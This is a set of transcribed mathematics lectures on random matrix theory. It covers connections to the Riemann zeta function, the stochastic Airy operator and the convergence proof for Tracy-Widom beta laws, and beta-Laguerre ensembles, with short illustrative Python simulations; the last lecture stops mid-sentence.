Is it known that the ratio has a limit? No. So the upper and lower bounds are known in the case beta equals one and beta equals two. That's all that's known. There are there are upper bounds and lower bounds, which are consistent with this log T to the beta squared. The lower bounds, basically the upper and lower bounds agree to be something like log T to the beta squared, but it's not completely clear that what whether there's an asymptotic in there. The lower bounds both have log T to the beta squared, the lower bands are unconditional, the upper bounds depend on the Riemann hypothesis. So on the Riemann hypothesis, you would certainly believe that this is the right asymptotic, but the upper and lower bands wouldn't give you this to make it a full asymptotic. Some other questions. Maybe I have a question. So you show the average of characteristic polynomial and then you show the. Yes. Moment. I will. And then maybe I won't ask. So what about if you take GUE? It will be the same. Yes. So for the GUE, you can also analyze it in more the same way. There isn't a nice simple formula like this for a finite size GUE matrix. But if you scale your moments appropriately with the correct mean density given by the semi-circle, you do get a limit that looks like that. So in the limit of large matrix size, you get simple formula that looked like this, but you then have to, as I say, you get here basically the local density of zeros given by the semi-circle. But you need the asymptotic formula. You need the asymptotic formula. Yeah, there isn't a nice simple formula like that. Okay, so some other questions. Okay. Families of random matrices where the scaling limit in each family is the U and the design kernel. And then you can do a sort of average and get the. Yes. Yes. So a good question. So if in fact the examples I wrote down, if you take the the orthogonal or the symplectic group, the eigenvalues of matrices of orthogonal and symplectic matrices lie on the unit circle. But in these two cases, in the orthogonal and symplectic cases, they come in complex conjugate pairs. So the eigenvalues of the form e to the plus or minus i theta n. So there are symmetry points in the spectrum. There's a symmetry point here. And there's one here and the eigenvalues come symmetrically distributed around those points. If you look at the statistics of the eigenvalues close to these symmetry points, for example, you ask how far is the first eigenvalue from that symmetry point. You get a different answer in either the orthogonal, symplectic or unitary cases. But if you ask questions about the statistics of the eigenvalue, local statistics far from the symmetry point, for example, what's the pair correlation of the eigenvalues at this point up here, then there is always unitary. So basically, for local statistics, if you're far from the symmetry point, you can't see the symmetry point. Did I answer your question? Okay, so any other questions? Okay, so let's thank John for his lecture.
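As a small numerical aside, not part of the lecture itself: the moment formula written out earlier, the Haar average of |det(I - A e^{-i theta})|^{2 beta} over U(N) equalling the product of Gamma(j) Gamma(j + 2 beta) / Gamma(j + beta)^2 for j from 1 to N, can be checked by direct sampling. Here is a minimal Monte Carlo sketch; the choices N = 6, beta = 1 and the sample size are arbitrary illustrations, and the estimate is only as accurate as the sampling allows.

```python
# Monte Carlo check of the U(N) moment formula for the characteristic polynomial.
import numpy as np
from scipy.stats import unitary_group      # Haar-distributed unitary matrices
from scipy.special import gammaln

def exact_moment(N, beta):
    """prod_{j=1}^{N} Gamma(j)*Gamma(j+2*beta) / Gamma(j+beta)^2, via log-gammas."""
    j = np.arange(1, N + 1)
    return np.exp(np.sum(gammaln(j) + gammaln(j + 2 * beta) - 2 * gammaln(j + beta)))

def sampled_moment(N, beta, samples=20000):
    total = 0.0
    for _ in range(samples):
        A = unitary_group.rvs(N)
        # |det(I - A e^{-i theta})| has the same law for every theta (rotation invariance),
        # so theta is set to 0 here.
        total += abs(np.linalg.det(np.eye(N) - A)) ** (2 * beta)
    return total / samples

N, beta = 6, 1.0
print("exact  :", exact_moment(N, beta))    # equals 7 for N = 6, beta = 1
print("sampled:", sampled_moment(N, beta))
```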
I will give an overview of connections between Random Matrix Theory and Number Theory, in particular connections with the theory of the Riemann zeta-function and zeta functions defined in function fields. I will then discuss recent developments in which integrability plays an important role. These include the statistics of extreme values and connections with the theory of log-correlated Gaussian fields.
10.5446/54165 (DOI)
Okay, thanks a bunch. So yesterday I just tried to alert you to the existence of this stochastic Airy operator, and then to show you that if you believed it existed, we could express all the characteristics of the beta laws in terms of the hitting probability of a simple diffusion, a simple random ODE. At the very end, I was showing that you can actually use these things to get some quantitative information, for those in the audience that like formulas, right, we can get some formulas. You know, for one of the bounds, it's a cheap test function in the variational principle; for the other bound, the lower bound that I didn't get to, you have to use the Riccati diffusion, which is a more flexible object. So those slides are online, so I won't go back there, I'll just forge ahead. So today what I want to do is actually try to prove things for you. There we go. So, you know, show that the stochastic Airy operator really makes sense, right, that it really has discrete spectrum, or at least give you an idea of how the proofs go, and then show that, honest to God, these beta-Hermite matrix models, which you'll remember are these guys with normalized Gaussians on the diagonal and this descending sequence of chi's, normalized in the same way, on the off-diagonal, and that if you take that tridiagonal matrix model and scale it the way you scale Tracy-Widom, then in some operator sense, which will be made really precise soon, you really have convergence to this stochastic Airy operator; and then hopefully to get to some payoffs for other ensembles, so you can get away from this beta-Hermite thing. Okay? All right. So now, I already kind of advertised that we're going to really understand the stochastic Airy operator through its quadratic form, and the Tracy-Widom beta law, or rather the negative of the Tracy-Widom beta law, will be defined as the ground state eigenvalue for that operator, which means it'll be the infimum of this quadratic form, right, with this sort of nice positive piece, that's an H1 norm plus a moment, and now this random quantity, right, the stochastic integral. And you've got to minimize, or take the inf, over all f satisfying these conditions: Dirichlet boundary condition, normalized in L2, and then you want the good part of the energy to be finite, all right? That's your out. I want to show you this thing makes sense. And I did mention yesterday that just a stupid integration by parts doesn't work. On the other hand, all you can do is integrate by parts. So you want to beat this db, which is a bad object, which means you have to integrate by parts in a slightly more clever way. And the idea is the following; you know, we had lots of ridiculous ideas along the way, but what gets the optimal result is the following point of view. The infinitesimal increment db of a Brownian path is hard to deal with, but if you could replace the db with a delta b, with a real increment, that's a much tamer object, all right? So this is actually what you do, you just, I always push the wrong button. So you take your Brownian path and you decompose it as its running average plus the error. So b-bar is just a little average of the Brownian path starting at x, the integral from x to x plus one of the Brownian path. There's nothing holy about choosing one, right? Just a little running integral of Brownian motion.
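In symbols, the objects just introduced look roughly as follows. This is only a transcription of what is described above; the beta-dependent constant in front of the noise term is written in the normalization that is usual for this operator, and should be checked against the speaker's slides.

```latex
% Stochastic Airy form (f smooth on [0,\infty), f(0)=0, \|f\|_{L^2}=1):
\langle f, \mathcal{H}_\beta f\rangle
  \;=\; \int_{0}^{\infty}\bigl(f'(x)^{2} + x\,f(x)^{2}\bigr)\,dx
        \;+\; \frac{2}{\sqrt{\beta}}\int_{0}^{\infty} f(x)^{2}\,db(x),
\qquad
-\mathrm{TW}_\beta \;\overset{d}{=}\; \inf_{f}\,\langle f, \mathcal{H}_\beta f\rangle .

% The averaging trick: decompose b into its running average plus the error,
\bar b(x) \;=\; \int_{x}^{x+1} b(y)\,dy,
\qquad
b(x) \;=\; \bar b(x) \;-\; \bigl(\bar b(x)-b(x)\bigr).
```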
And then you just write the Brownian motion, which you're going to stick into this stochastic integral, as its average minus the error you made because you don't actually have the average, right? And then you write out what you get. So this is just notation for this stochastic integral; I'm thinking of the white noise, if you like, as a multiplication operator: hit it against stuff on one side, hit it against stuff on the other side, and integrate, okay? So if you follow this through, you have this object, which is what? The derivative of the average is simply Brownian motion at x plus one minus Brownian motion at x. And that's what you're trying to accomplish: I'm trying to replace db with delta b, and there's your delta b, okay? If you could stop there, life would be great, but you can't stop there, because that's not what you have. So this is the error to that, and that error you integrate by parts, all right? So this is an absolute equality, an almost sure equality, at least again for f smooth and of compact support, all right? And we use this idea and we get this random inequality that holds for all functions in that Sobolev space L, all functions that are in H1 plus a moment. So here's how it reads. You pick any little constant you like; see, I'm going to use little letters for deterministic numbers and big letters for random numbers, all right? So you pick any little constant c you want, and I can bound this stochastic integral by c times this kind of Sobolev norm plus a random constant times the L2 norm. Now this random constant: I don't have much control over it. It depends on the c you choose, it depends on the Brownian path in some way, I don't know, but it's almost surely finite. Okay? And this is how it works. Again, you do this trick: you try to replace the db with a delta b by replacing Brownian motion with its average. And the reason just integrating by parts in the most immediate way doesn't work is because at some point you have a Brownian motion squared, and you try to hide it under the potential for stochastic Airy, which is just linear, right? The squared Brownian motion grows faster than x. But an increment of Brownian motion grows very slowly; the increment of Brownian motion, as a process, only grows logarithmically. So here's a little exercise. It's a bit ugly to unfold, but check out what's happening. If I take a little increment of Brownian motion, Brownian motion at x subtracted off of Brownian motion at x plus y, and even if I sup over all y in a finite range up to 1, and then I sup over all x for all time, this thing only grows logarithmically, in fact like a square root of log, right? So this random object is bounded by a constant, a random constant, right? So it's almost surely bounded; that C of b is almost surely finite, right? And this is like a law of the iterated logarithm for this difference. That's exactly the point: if you didn't have the difference, if you just had Brownian motion, on the bottom you would have x log log x, and that's too much for us. But if you replace the Brownian motion with its increment, then this only grows logarithmically; you lose the polynomial power, okay? And so this thing, the derivative of b-bar, is exactly such an object. So this thing only grows like log, a random constant times log, yes?
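A quick numerical aside on that growth rate, before the estimate continues: on a simulated Brownian path one can compare the sup of unit-window increments against the path itself. The grid step, horizon, and sample points below are ad hoc choices of mine, and the random-walk approximation of Brownian motion is only illustrative of the lemma, not part of any proof.

```python
import numpy as np

rng = np.random.default_rng(0)
T, dt = 4000.0, 0.01                       # horizon and grid step (arbitrary choices)
n = int(T / dt)
b = np.concatenate([[0.0], np.cumsum(rng.normal(0.0, np.sqrt(dt), n))])   # Brownian path on the grid

win = int(1.0 / dt)                        # grid points per unit window
xs = np.arange(3, int(T) - 1)              # integer sample points x (start at 3 so log x > 1)
inc_sup = np.array([np.max(np.abs(b[int(x / dt): int(x / dt) + win + 1] - b[int(x / dt)]))
                    for x in xs])          # sup over 0 <= y <= 1 of |b(x+y) - b(x)|

print("max of sup-increment / sqrt(log x):", (inc_sup / np.sqrt(np.log(xs))).max())
print("max of |b(x)|        / sqrt(log x):", (np.abs(b[(xs / dt).astype(int)]) / np.sqrt(np.log(xs))).max())
# The first ratio stays O(1), in line with the sqrt(log) growth claimed for increments;
# the second keeps growing, since |b(x)| itself is really of order sqrt(x log log x).
```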
And you can certainly fit that under x, okay? And then you Cauchy-Schwarz this object, and you have an f prime squared, which you can fit under this, and then you get another f squared times this object squared; but this also grows only logarithmically, so you can fit him under x too. All right, that's the idea. And to prove this you don't need to know anything about Brownian motion before today. If I just tell you that Brownian motion has independent, homogeneous increments, so every increment of Brownian motion looks the same, and that each increment is Gaussian, has a Gaussian distribution, then, okay, you've got to look up one thing on Wikipedia: the sup of Brownian motion on a short interval also has Gaussian tails. Those two ingredients will give you this little lemma, and that gives you this inequality, which you first prove for smooth functions of compact support and then you take limits; it holds for all functions of the class you want. And what does that mean, what's the payoff here? All right, let's just throw in some notation. So we have this space of functions that we're trying to define this quadratic form over. Can you say a little bit about this? This statement goes by very rapidly, for people that are not probabilists; can you look back a slide? I can. So there's a C of b, less than infinity almost surely. Yeah, so you pick any c you want to put here, any little c, ten to the minus twenty-third, right? And there is a random variable; it depends on the Brownian path and it depends on the c you pick, but omega by omega it's finite. With probability one it's a finite random variable. So this is like a Sobolev inequality type thing, but the constant: it is not uniformly bounded. It is not uniformly bounded. For each realization of the random process it's whatever; it could be enormous, and it almost surely is. Yeah, absolutely. Right. Okay. But it's really kind of the best one can hope for, and you'll see it's all we need. Does that make sense though? Here's kind of the point of this whole philosophy, this random operator thing: you can't compute correlations, you can't compute any distributions, right? So you have to argue path by path. You get a new constant for each path: for each Brownian path, each realization of the noise in your random operator, you get a different bound. As long as those bounds are finite, you can argue path by path, if that helps. Okay. So this is a norm squared on this space. Remember, in stochastic Airy you have a gradient squared and then you have a little first moment, so I'm just defining the natural Hilbert space that goes with that and putting a norm on it. So you have this squared norm on L, and here's what that random inequality allows you to show. Again, more big C's, right? For any little c, you have bounds above and below on your quadratic form associated with stochastic Airy: you can bound it above by a random constant times this norm, and below by a small deterministic constant times the norm minus some huge, possibly huge, random constant times just the L2 norm, by sticking in that thing from before and bounding below, right? If you like, you have this thing and what you want... let's go back to, maybe I should do this.
What I need is a lower bound on this thing, on how negative it can be. And the worst it can go negative is maybe one half times this, plus a huge random constant times the L2 norm, and then you feed this in here. So you have bounds above and below on your quadratic form, random bounds above and below. Okay. And once you have this, you're off to the races. Now you do the things you do when you look up a classical book on variational principles. I want to extract an eigenvalue and eigenfunction out of this quadratic form, so you pick a minimizing sequence, and you can argue that the operator associated with this quadratic form has a ground state eigenvector and a corresponding eigenvalue, in the following way. Do you care if the left-hand side is negative? Oh, not at all, not at all. Tracy-Widom takes negative values, right? The random variable takes negative values, and it has an infinitely long tail, so this thing had better be able to take negative values. Absolutely. But okay. So take a minimizing sequence. You're taking an infimum, so there is a minimizing sequence, and this is almost surely, again path by path; it converges to something, and I'm defining this lambda-naught tilde... I mean, a lot of notation. But this random variable will be almost surely bounded below, because this form is almost surely bounded below. Again, maybe it's very negative, but I don't care. Okay. And now here's the deal. When you have this minimizing sequence, why do you want such an inequality? Because if you're taking a minimizing sequence, you have a priori control of an H1 norm, an L2 norm, and a moment, path by path. With such control you can at least extract a subsequence that converges weakly in H1 and converges in L2, and then you might be concerned that along this subsequence you lose mass. That can happen: just because you have a sequence converging in H1 and L2 doesn't mean the limit isn't zero. But it won't be zero here, because you also have control of x times f squared; that gives you tightness, so you can't have mass wandering off to infinity. So in fact you can pick a subsequence, call it f sub n prime, that converges to some object that is going to live in L: it converges weakly in H1, it converges in L2 properly, and it converges uniformly on compacts, because you have control of the H1 norm, and on the line the H1 norm gives you Holder continuity, exponent one half. So it converges, honest to God, to a function, a random function; omega by omega you have this convergence, okay? All right. And then what can you conclude? The point is, now you can conclude that the infimum is actually realized: there is a subsequence such that this holds, they converge to some f-naught, and you have this equality. We defined this to be the infimum, and I'm saying there is a function at which it is realized, again omega by omega. But then this is an eigenfunction. Why is this an eigenfunction? Because then you play the trick. So maybe this is silly to even write out, but then you have this lambda-naught tilde, okay?
Well, let's just do it, okay, fine. I'm rewriting this: f-naught, H-beta, f-naught. But this is the minimum for this quantity. So if you play the game, you do something like this: you go back into the quadratic form and you perturb. I take this f-naught, which exists and is the minimizing function, and I do something like this, where phi is some smooth, compactly supported function. You take a derivative and set epsilon equal to zero; this is going to be zero because f-naught is the minimizer, almost surely. And if you just do that and read it out, what does it look like? It looks like the eigenvalue problem for H, in distribution. And that's the best you can hope for, because your potential is a distribution. So this is how you characterize the minimizer and the corresponding eigenfunction. So what I'm saying is that this really is an eigenfunction, and then we simply declare that this lambda-squiggle-naught is lambda-naught: it's the ground state eigenvalue. And right now I'm just defining that as Tracy-Widom beta. The definition will have bite once I show that you really have convergence of the discrete operators to the same quantity. Any questions? Yeah? Okay. Yeah. No, absolutely not, path by path, with the Brownian path fixed, yeah. So you're making a deterministic argument, but you're able to do it omega by omega. What does it mean that you can eliminate the tilde? Oh, I mean, this is just... I'm saying there was some object that's the minimizer, and I'm saying now we can declare it. I wanted to reserve this notation for eigenvalues proper, and really I'm saying this really is an eigenvalue. There's no change, right? I'm just erasing the tilde. The tilde was in case it didn't work out, but it worked out, so we can erase the tilde. Okay. And then you can define higher-order eigenvalues and eigenfunctions for stochastic Airy through Rayleigh-Ritz. So again, first with a tilde, which we'll then erase: you say, I'm going to minimize, because now I have an honest-to-God ground state eigenfunction, and I'm going to take minimizers over everything perpendicular to that. But again, when I do that minimization problem I'll have control in L2, and with control in L2 the minimizer of this problem will, in the limit, still be orthogonal to f-naught; it'll give me something else. All right? Okay, so. Does that show you that lambda-zero tilde is bounded almost surely, or something like that? Well, it's almost surely finite, above and below. It's not bounded; I mean, you can't find, with probability one, a single given finite number that bounds it, right? But it's an almost surely finite random variable. It doesn't have any mass at either endpoint. Is that... yeah, that's what it shows. Okay, so you can go through the classical Rayleigh-Ritz thing and push the same kind of argument through and just iterate. How do you prove that? I mean, can you write something down? Well, it's this inequality. This constant is almost surely finite, right? Here's a lower bound on the quadratic form, erase this, right? And I'm minimizing over functions that have L2 norm one.
So it's just this minus that, where again this constant comes from that random Sobolev inequality; I, you know, quote-unquote call it that, right? But it's almost surely bounded below. It's back to the statement that capital C is somehow almost surely finite. Which you find, yeah, for each realization. Exactly, exactly. So in the sense of quadratic forms, it's the minimum, the minimum of the... okay. Okay, no. Okay, so even at this stage there are some payoffs, and I'd like to tell you some cute little things you can do. So this stochastic Airy operator: it's called stochastic Airy because you take Airy and you add white noise, right? Now, I just made a big deal about the fact that white noise is not a small perturbation of the Airy operator, but for large energies it kind of is. So you can rework what we had. I'm using this curly A, Cal A, for the classical Airy operator, and you can rework what we just did to show the following: as operators, or as quadratic forms, stochastic Airy is, for any epsilon you like and again some big random constants, bounded above by one plus epsilon times Airy plus a big random constant times the identity, and bounded below by one minus epsilon times Airy minus a big random constant, in the sense of quadratic forms. The same proof will show that. And then here's a cute thing. The regular Airy operator has eigenvalues that are the zeros of the Airy function, right? And it is known that for large k, the large-k eigenvalues of Airy look like this. Now, if you feed that into here, you can show that the capital Lambda k, the eigenvalues of random Airy, of stochastic Airy, have the same sort of asymptotics with probability one. So for high energy levels, random Airy looks like regular Airy. And that should make sense, because as you go deep into the Airy spectrum it becomes more and more regular, and this is kind of a statement of that. Of course, the low-lying eigenvalues are very random, because this is a big random constant, a random constant I have no control over. But when I look at high energies, I can kind of wash that out, in a sense. And so this is a cute fact about random Airy. Okay. Can we just... in what way is the epsilon small? Oh, I can pick it, right? So it has to do with, how do I say this nicely... well, okay, let me go. Where do I have the... I should write the quadratic form. If here's our quadratic form... no, that's not our quadratic form, this was poor planning. This thing I can make look like epsilon times this, plus a big random constant. So above, I get one plus epsilon times basically the Airy quadratic form. Yeah, do you see? Okay. And then below. Okay. Okay, sorry. All right. So now I want to get into the convergence proof, okay? And the philosophy of how we even defined stochastic Airy really guides how the convergence proof goes: it all goes through the quadratic form. Okay. So remember our matrix model: you have these Gaussians on the diagonal and these chi's on the off-diagonal, all right? And for a matrix there's no controversy in defining things, so I'm going to call this Tracy-Widom beta n, the nth approximant to Tracy-Widom: it is the minimization over this matrix. There's nothing fancy going on, right?
So you take your matrix, the rescaled beta-Hermite matrix, and you minimize over vectors of little-l2 norm one, right? And that's the definition of the ground state. Okay. And so you've got to write that thing out, all right? You just write out what it looks like, and you write it knowing what you want. What we're going to show, in a sense, is that this random discrete quadratic form goes to our continuum quadratic form. Our continuum quadratic form had an H1 part, the gradient of f squared, plus some x part, some deterministic potential, and then noise, all right? So you massage things to get a discrete gradient squared; you want that in there, so you put it in there. And then, what's going on here with all this notation: I'm just pushing the noise to the end, all right? So this a sub k is what? This a sub k is beta times this thing; it comes from completing the square here. You need to put it in, so you put it in and you take it out. And then remember, down in the noise terms I have some chi's, and whenever you have random variables you normalize them: you subtract off the mean, and if you subtract it off, you've got to put it back in. So I put all the deterministic stuff in the next term, all right? And this is just what you get. And then you have two noise terms: one comes from the diagonal, so the y-super-ones are just this process of now differently rescaled Gaussians, and the y-super-twos are centered and scaled chi's, which I don't even write out because it's gross, right? That's just a bunch of n's and betas and chi's that have been normalized by their means, all right? Okay. And then I want to look at this random quadratic form. So this is what we want to show: minimizing this matrix inner product in R^n converges to this object in this Sobolev space. Okay, one issue here is that these quadratic forms live on different spaces, but that's not so much an issue, because you can think of a matrix acting on L2 by taking the function you want it to act on and discretizing it in the appropriate way. And you know how you want to discretize, too, because you know what the continuum scale is supposed to be: n to the minus one-third. So now think of your matrix, your rescaled beta-Hermite matrix, when it acts on a vector, as really acting on functions in L2: I take a function supported on the half-line, I chop it off at n to the two-thirds, and then I break it up into little n to the minus one-third chunks. That gives me n chunks on the right spatial scale, and that's really where this thing is living. And that way they're living on the same space, right? Okay, so this is what I'm writing here. We're going to embed this discrete minimization problem into L2 by doing exactly what I just said. I wrote it the other way: for any vector in little l2 you identify it with some function, a piecewise constant function, in big L2, right? And then, thinking that way, all I'm doing is rewriting the previous slide with these normalizations in there, right?
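Before following that embedding any further, here is a quick numerical sanity check of the convergence claim being set up: sample the tridiagonal model and look at the centered and scaled top eigenvalue. The normalization used below (N(0,2)/sqrt(beta) on the diagonal, chi with beta*(n-k) degrees of freedom, divided by sqrt(beta), on the off-diagonal, centering 2*sqrt(n), scale n^(1/6)) is what I believe matches Dumitriu and Edelman and the lecture's slides; treat it as an assumption of the sketch.

```python
import numpy as np
from scipy.linalg import eigh_tridiagonal

def tw_beta_sample(n, beta, rng):
    """One draw of n^(1/6) * (lambda_max(H_n^beta) - 2*sqrt(n)) from the tridiagonal
    beta-Hermite model (normalization assumed, see the lead-in above)."""
    diag = rng.normal(0.0, np.sqrt(2.0), n) / np.sqrt(beta)
    off = np.sqrt(rng.chisquare(beta * np.arange(n - 1, 0, -1))) / np.sqrt(beta)
    lam_max = eigh_tridiagonal(diag, off, eigvals_only=True,
                               select="i", select_range=(n - 1, n - 1))[0]
    return n ** (1.0 / 6.0) * (lam_max - 2.0 * np.sqrt(n))

rng = np.random.default_rng(7)
n, beta, reps = 400, 2.0, 2000
samples = np.array([tw_beta_sample(n, beta, rng) for _ in range(reps)])
print("empirical mean / variance of the centered, scaled top eigenvalue:",
      samples.mean().round(3), samples.var().round(3))
# For beta = 2 the limiting mean should be roughly -1.77 (the classical GUE Tracy-Widom
# value); these finite-n numbers are only meant as a qualitative check.
```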
So that gives you kind of a new normalization. Every v, every v_k, you really want to think of as looking like some f of k over n to the one-third, times one over n to the one-sixth. So you're pre-scaling the vectors; that's the right scaling to take. If you're paying attention to minute details, some of these scalings have changed from the previous slide, but it's just been put in the right space; otherwise it's identical. And here's what you notice. A calculation shows: here's your gradient squared, that's beautiful, you know what to do with that in the continuum. But then you have all this other junk, right? And it's a very easy exercise to show that the running sum of these deterministic potentials goes to x squared over 2, and the running sum of the noise in the potential goes to 2 over square root of beta times Brownian motion. This is the classical central limit theorem; it's a sum of independent random variables. And in fact this is the kind of thing the theorem will give you: it'll show Tracy-Widom convergence by a simple functional central limit theorem. It basically comes down to this: you want to prove Tracy-Widom for some family of tridiagonal operators, and you want to recognize the convergence through stochastic Airy. Well, stochastic Airy is Laplacian plus something. So you factor off the Laplacian from your matrix model, and the rest, the something, you view as a potential. You never prove anything converges to white noise; the way you prove something converges to white noise is to prove that its running sum converges to Brownian motion. So if you can prove the running potential goes to x squared over 2 plus Brownian motion, you're kind of done. Well, you're not done, but that's the idea. So I call this an improved heuristic over Edelman and Sutton, because this is just the better place to do things: the better place to do things is at the quadratic form, and because the potential is delicate, you've got to deal with the integrated potential. That's all. So do you sum by parts to get to these objects? Yeah, you do a little summation by parts. Because there are no v's in there. Well, there are no v's because here I'm just thinking of the potential by itself. But in the guts of the proof you sum by parts, because even at the continuum level you had to integrate by parts to be able to control things. So you sum those series up there by parts. Yeah, in the proof, the differences of the v's, exactly. All this potential, you're not going to understand pointwise; it's too delicate, right? If you do a summation by parts, I'm saying what you're going to get at: things of this type. This is the running potential, the running random potential, up to the continuum position. And this is easy, at least at the level of pointwise convergence in x and convergence in distribution on this part. And that's the right place to identify stochastic Airy. Okay, but this all still needs some estimates, okay? So what do you need to do? It's almost the same kind of thing: you need to show this discrete quadratic form is bounded below, again almost surely, but now in n. So here is the kind of thing we prove.
So yes, very much as in the continuum proof for stochastic Airy. Here, you remember, this was one of our random noise terms, the y-super-ones were just our rescaled Gaussians, and we prove an inequality like this: some small constant times... what is all this stuff? You know what that is: it's a discrete version of our Sobolev norm from before, the appropriate discrete version, right? And then here's your l2 norm, on the appropriate scale, and there's a random constant, a random variable. This random variable depends on the little c you want to put here; it depends on all the noise terms, here a bunch of Gaussians; but it also depends on n, because for each n you have a different problem. And you prove that this sequence of random variables is tight. If you don't know that language, it means the sequence of random variables is precompact, meaning it has subsequential limits in distribution. So at least over subsequences it's bounded. And I just wrote one down, but for both noise terms, the other noise term being the thing with the chi's, we have a similar inequality. This is what I'm saying. Any questions? Where does the C_n come in? This is what we want to prove. So here's what we want to prove. Again, okay: we have these noise terms that are worrisome, right? But what I'm going to prove is that I can bound them by a small constant times the good part of the discrete quadratic form plus some junk times the l2 norm. And when we compute discrete eigenvalues, we minimize over vectors such that this object is 1, but you get some random stuff, some random error. What we prove, and what the statement here is: anyone could write down an inequality like this, but what you can prove is that this sequence of capital C's, which are random, is tight. It's a tight sequence of random variables, which is the next best thing to them being uniformly bounded in n, because at least you have them bounded over subsequences, okay? Tight random variables: that's probabilistic mumbo-jumbo, in probability we have a different word for everything. Tight means sequentially compact in distribution, that's what it means, okay? That first sum is exactly one of the noise terms? Exactly, exactly; it's that first noise term, exactly. And we have an exact inequality; for each noise term we have such an inequality with the same kind of C's, it's just gross to write them both out, right? So what does this translate to? It translates to something that should look familiar. Here is our discrete quadratic form, and for every n you have such a thing, and what we can prove is that there's a deterministic constant times the right discrete H1-plus-moment norm, then a sequence of random constants times the little-l2 norm below, and another sequence of random constants above. So it's the exact analogue of what I had at the continuum, except these random constants now depend on n, because you have a sequence of problems. But again, they're tight. All right, and now this is what you do: for the discrete problem you have an honest-to-God minimal eigenvalue and eigenvector, and of course the eigenvector you're going to think about as a function, a discretized function in L2.
So there's a subsequence such that... so lambda-naught-n is the eigenvalue for this object, right? Because of this, there's at least a subsequence of the lambda-naughts, indexed by n prime, and the corresponding eigenvectors, such that this converges to something in distribution and this converges as well. I mean, this one is work: this part is immediate from these inequalities, but this part takes some work. We can show that, over any minimizing sequence, these vectors, from control over a kind of discrete H1 and a discrete version of the moment bound, converge to a function that's in H1 and L2, okay? Yeah. These C_n's, are they the C of b which you had before? Right, but remember, the noise: for every matrix model, as the dimension keeps cranking up, you have new Gaussians, right? So it also depends on n. Sure, and however horrible the C of b may be, the C_n approximates it well, and therefore they're tight. But it's not even that, I mean, you can do that, right? In the following way, okay, well, you'll understand this. What you might think you would like to do is build all the Gaussians and the chi's in your matrix model on the same space as your Brownian motion, and then that's exactly the statement you would have. But you don't even have to do that, and that is in fact what we did first; then we realized what you can do is just show that this sequence of C_n's, which depend on your sequence of Gaussians and your sequence of chi's, is by itself tight, and after the fact you say Skorokhod embedding: there is a probability space on which all these Gaussians and all these chi's live together with the Brownian motion in the limit, and then you do that. So you don't have to do that extra work, but morally it's the same, in a sense, right? So at least you have subsequential convergence, right? And then, and this is work, what you can show is that this limit, after summing by parts and having control of the appropriate norms, can be pushed through: at least along subsequences, this discretized thing will go to, it'll go to, I apologize, f-star hit against the stochastic Airy operator; it goes to the right continuum form, okay? And now what does that mean? It means you have this in the limit: your lambda-star and your f-star are an eigenvalue-eigenvector pair for stochastic Airy. Of course, you could have lost something: it doesn't have to be the ground state anymore, right? All this means, which you get by taking subsequential limits, is that it is some eigenvalue-eigenvector pair. So you need another argument to show that it actually is the ground state, that you don't go up the chain of eigenvalues for stochastic Airy. And once you have that, the proof is done, right? Because at this point you've said, well, it just means that over any subsequence I have some limits; but now you play the game, right?
Ken is the bad guy, you know: he gives me some subsequence of operators, and I say, from any subsequence of operators I can choose a further subsequence such that this happens. So then you play the subsequence-of-a-subsequence game. For every subsequence of operators going to infinity, I take a further subsequence such that all of this holds, and there's another argument to get this inequality, and that identifies the thing. So then you can really call this lambda-naught Tracy-Widom beta, because it really is the distributional limit of these beta-Hermite guys. So there's a lot of technical stuff in there, but that's the philosophy. Any questions? Okay, so that's the convergence proof. Yeah. So the capital C_n's, those are simple objects that you can estimate, because you have Gaussians and, what are they, chi variables? Yeah, I mean, at some level in the proof there's some functional of sups of Gaussians and chi's and things like this, but yeah. I was going to ask, is it the case that the statements about capital C being bounded almost surely actually come from taking these limits? No, no, no. The capital C, that was done at the level of the actual limiting stochastic Airy, and that came from... Just making sure I understand. Yeah. I would see a way to prove that those things are bounded by using the finite-dimensional ones. But it's even better at the continuum, right? If I understand your question: just proving stochastic Airy is bounded below, it's a similar functional of a Brownian motion. Okay, so you just live in the infinite-dimensional space. Yeah, yeah, and you kind of need that, right? Because when I target this, I'd better have this thing defined somehow, ahead of time. You know what I'm saying? At some point in this proof you actually have to think about... you can imagine a little add-and-subtract: you have your discrete vector, your actual nth-level eigenvector, and you have to think about that thing being hit against stochastic Airy, with the Brownian motion in it. So you need those bounds at the continuum anyway, even ahead of time. Okay. So there is a whole wealth of ensembles for which you have Tracy-Widom convergence, and this argument can work for most of those. I just want to give you an example and then try to give you what I think is one of the better applications of this whole random operator picture. So we have these Wishart ensembles, and these are matrix models of the form M M-transpose, where M is n by m and all i.i.d., right? And at this point it's classical that if you take real, complex, or quaternion Gaussians, these are Pfaffian or determinantal processes; instead of Hermite functions you have Laguerre functions; and, starting in the early 2000s, people proved Tracy-Widom fluctuations for the biggest rescaled eigenvalue of these Wishart ensembles.
So it was done by Kurt Johansson in the complex Gaussian case, and he was actually after something in ASEP; and Iain Johnstone, who's an actual statistician, a card-carrying member of the statistics tribe, proved it for the real Wishart case, because it actually comes up in statistical applications, right? So this is known stuff. On the other hand, there is a natural general-beta version of all the Laguerre, or all the Wishart, ensembles, whatever language you like. And here's what it looks like. What I'm doing now is just writing down a density on n points, now on the positive half-line, because the eigenvalues of M M-transpose are non-negative. So here is a density: again a Vandermonde to the beta, now against this kind of gross weight, right? And here's the deal: this is going to make sense for any positive beta and any kappa bigger than n minus 1, all right? And when beta is 1, 2, or 4 and kappa is m, this is exactly the eigenvalue density for those real, complex, and quaternion Gaussian Wisharts. So this is a family: these are the beta-Laguerre ensembles, where you get to generalize not just beta but also one of the dimensions to a real variable, if that turns your crank, right? You don't need integers in both dimension coordinates, okay? And there is a matrix model too, a tridiagonal matrix model, for all beta. This is again work of Dumitriu and Edelman, and this is what it looks like. To cook up the matrix model for the whole beta-Laguerre family you do the following. First you cook up a random upper-bidiagonal family, which has a descending sequence of chi's on the diagonal and on the off-diagonal; one sequence of chi's is tied to the first dimension parameter and the other to the second, okay? All chi's appearing here are independent, even if the notation gets reused when kappa happens to be n; everything inside is independent. And then their theorem is: if you look at B B-transpose, the eigenvalues of that thing have joint density beta-Laguerre, okay? And it's a little exercise you can show yourself: for any m, if M is an actual m-by-n, honest-to-God matrix of independent, say, real or complex Gaussians (forget the quaternion case), you can find U and V such that, rotating M by some unitary on the left and some unitary on the right, you can bidiagonalize it, again by the same sort of Householder transformations we had before, okay? So if you do this thing times its transpose, you eat the V in the middle and you maintain the same spectrum, and that's how it works. Okay, so here's the theorem; it's not that exciting at this stage, but: you form this bidiagonal matrix and then you take B B-transpose, now that's tridiagonal, and the eigenvalues of this thing... if you like, you can say the singular values of this dude are the singular values of that guy. Okay, so just for completeness: if you take the ordered 